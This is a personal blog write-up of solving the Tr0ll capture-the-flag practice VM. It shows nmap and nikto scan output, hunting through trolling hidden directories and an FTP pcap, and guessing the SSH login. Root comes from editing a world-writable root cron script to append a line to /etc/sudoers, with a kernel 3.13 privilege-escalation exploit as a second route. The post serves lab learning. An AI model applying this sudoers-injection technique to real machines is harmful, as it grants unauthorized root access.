Tuesday, February 7, 2017


I heard about this VM on /r/netsecstudents (I forget what post). I figured I would give this one a shot, even if its meant to be a bit more difficult then the three Kioptrix VM's I've written about so far.

Right off the bat I perform a nmap and a nikto scan. Nmap showed a few open ports.

root@kali:~# nmap -T4 -A -v

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-02-07 20:09 EST
NSE: Loaded 140 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Initiating ARP Ping Scan at 20:09
Scanning [1 port]
Completed ARP Ping Scan at 20:09, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:09
Completed Parallel DNS resolution of 1 host. at 20:09, 0.06s elapsed
Initiating SYN Stealth Scan at 20:09
Scanning [1000 ports]
Discovered open port 21/tcp on
Discovered open port 22/tcp on
Discovered open port 80/tcp on
Completed SYN Stealth Scan at 20:09, 0.05s elapsed (1000 total ports)
Initiating Service scan at 20:09
Scanning 3 services on
Completed Service scan at 20:09, 6.03s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against
NSE: Script scanning
Initiating NSE at 20:09
Completed NSE at 20:09, 0.23s elapsed
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Nmap scan report for
Host is up (0.00020s latency).
Not shown: 997 closed ports
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 09  2014 lol.pcap [NSE: writeable]
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|_  256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:5B:3D:FD (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 0.001 days (since Tue Feb  7 20:08:02 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

1   0.20 ms

NSE: Script Post-scanning.
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.54 seconds
           Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.290KB)

At this point I checked out what a web browser could show:
The page source didn't show much:
<img src=hacker.jpg>

This is where the nikto scan cam in handy.
root@kali:~# nikto -h
- Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port:        80
+ Start Time:         2017-02-07 20:11:48 (GMT-5)
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x24 0x500438fe37ded
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/secret/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7536 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2017-02-07 20:12:03 (GMT-5) (15 seconds)
+ 1 host(s) tested

Checking out (which is pointed out in the robots.txt page) got another meme:

<img src="troll.jpg">

icons/readme had (among other stuff).

Suggested Uses

The following are a few suggestions, to serve as a starting point for ideas.
Please feel free to tweak and rename the icons as you like.

          This might be used to represent PostScript or text layout

     alert.black.gif, alert.red.gif
          These can be used to highlight any important items, such as a
          README file in a directory.

     back.gif, forward.gif
          These can be used as links to go to previous and next areas.

     ball.gray.gif, ball.red.gif
          These might be used as bullets.

Going back to the nmap scan I decided to check out the ftp port by going to

This pcap file shows the ftp transfer of secret_stuff.txt. At first I was reading too much into this, thinking I should try and extract the .txt file. I did encounter a great blog showing how to do this though:

"FTP Data Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P\n\nSucks, you were so close... gotta TRY HARDER!\n)"

sup3rs3cr3tdirlol - secret directory huh. might as well try to find this. Second try and I got it (first try I tried sup3rs3cr3t)

 Another file to decipher...... more trolling. After downloading the I found out the file was an ELF binary.

I spent a good amount of time looking up how to edit/view a binary. Even spending a decent amount of time in edb. I was looking for a clue, troll or something at a memory address of "0x0856BF"

 As an act of pure luck I decided to try "0x0856BF" as part of a web address.

 good_luck/ contained a text file called "which_one_lol.txt"
genphlux < -- Definitely not this one
While this_folder_contains_the_password/ contained a text file called "Pass.txt"

The folder says the password is in the folder so I guess is password is "Pass.txt" (not Good_job_:))
At first I thought it was genphlux and "Pass.txt" as the password
After many more guesses I get in with the username: overflow

After a good bit of looking around I found another clue.... maybe even a troll:
Before going further I was kicked out (2nd time it happened).

cleaner.py is a python script that performs: "rm -r /tmp/*". Cool thing is this file has rwx permissions for all users. If the file is edited to grant the user overflow root permissions then we're set. The catch is the script needs to run as root to edit sudoers file. Which is a waiting game since the script is already in the crontab.

        os.system('echo overflow        ALL=(ALL) ALL >> /etc/sudoers ')

and we have root!
 While searching around I also got the OS version:
cat /proc/version
Linux version 3.13.0-32-generic (buildd@roseapple) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 

 There's a few privilege escalation exploit for version 3.13. Might as well try it as well. Like I've done before I copy this over to /var/www and get apache running. This way I can get a copy of it onto the Tr0ll box. I ended up trying four of these before I found one that worked.

There you go. Two ways to get root on this box..... Once you've fought your way past all the Trolling!

No comments:

Post a Comment